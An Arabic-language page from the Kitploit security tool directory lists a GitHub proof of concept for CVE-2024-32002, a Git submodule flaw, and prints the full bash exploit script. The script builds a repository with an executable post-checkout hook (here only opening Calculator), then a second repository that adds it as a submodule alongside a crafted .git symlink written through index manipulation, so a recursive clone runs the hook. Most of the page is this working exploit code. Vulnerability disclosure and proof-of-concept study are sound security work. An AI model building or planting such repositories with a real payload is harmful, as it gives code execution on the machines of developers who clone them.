Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32002-Exploit — إثبات مفهوم لاستغلال CVE-2024-32002، وهي ثغرة في الوحدة الفرعية Git تتيح تنفيذ تعليمات برمجية عشوائية عبر مستودعات وروابط رمزية مصممة. | Kitploit
أدوات/GitHubGitHub/bfengj/cve-2024-32002-exploit
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن سلسلة التوريدالفريق الأحمر
GitHubbfengj/cve-2024-32002-exploit

CVE-2024-32002-Exploit

إثبات مفهوم لاستغلال CVE-2024-32002، وهي ثغرة في الوحدة الفرعية Git تتيح تنفيذ تعليمات برمجية عشوائية عبر مستودعات وروابط رمزية مصممة.

عرض المستودع
22منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
root@kitploit:~
#!/bin/bash

git init hook
cd hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
open -a Calculator.app
EOF


chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"
git remote add origin [email protected]:bfengj/CVE-2024-32002-hook.git
git push -u origin main

cd ..


git init exploit
cd exploit
git submodule add --name x/y [email protected]:bfengj/CVE-2024-32002-hook.git A/modules/x
git commit -m "add-submodule"

# إنشاء رابط رمزي
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git remote add origin [email protected]:bfengj/CVE-2024-32002-Exploit.git
git push -u origin main
cd ..

#اختبار
git clone --recursive [email protected]:bfengj/CVE-2024-32002-Exploit.git exploited
تنزيل الأداة